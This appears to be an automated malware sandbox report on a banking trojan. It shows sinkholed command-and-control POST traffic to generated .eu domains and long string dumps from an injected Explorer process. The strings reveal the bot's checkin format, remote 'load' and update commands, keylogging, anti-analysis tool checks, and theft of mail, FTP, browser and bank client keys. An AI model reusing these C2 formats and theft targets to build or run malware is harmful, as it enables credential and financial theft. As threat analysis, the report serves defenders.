HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofozymufok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2016 05:29:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole
51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Sun, 04 Sep 2016 05:29:48 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.tech - where the bots party hard and the researchers harder...0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:45 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: puvybivihox.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqohyxeqak.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:52 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:07 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qebahilojam.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:15 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: tucyguqaciq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:29:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 04 Sep 2016 05:30:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
Explorer.EXE_532_rwx_02250000_000B2000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
AUTHINFO PASS
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
ssleay32.dll
ssleay32.dll
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
WinExec
WinExec
SetThreadExecutionState
SetThreadExecutionState
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
GetKeyboardLayoutList
GetKeyboardLayoutList
GetAsyncKeyState
GetAsyncKeyState
GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current
Explorer.EXE_532_rwx_02AF0000_000B8000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PASSu98V
PASSu98V
PASSu08V
PASSu08V
FTPQ
FTPQ
12345678
12345678
password1
password1
monkey
monkey
monkey1
monkey1
password
password
Pname.key
Pname.key
\secrets.key
\secrets.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
sysinfo.log
sysinfo.log
scr.jpg
scr.jpg
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.8.14
4.8.14
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
/search.php
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
ntdll.dll
ntdll.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
\firefox.exe
\firefox.exe
keygrab
keygrab
u.jpg
u.jpg
IprivLibEx.dll
IprivLibEx.dll
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
sniff.log
sniff.log
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\opera.exe
\opera.exe
\cbmain.ex
\cbmain.ex
\iscc.exe
\iscc.exe
\clmain.exe
\clmain.exe
\wclnt.exe
\wclnt.exe
internal_wutex_0xx
internal_wutex_0xx
%s.dbf
%s.dbf
%s.DBF
%s.DBF
pop2://%s:%s@%s:%i
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
PTF://anonymous:
AUTHINFO PASS
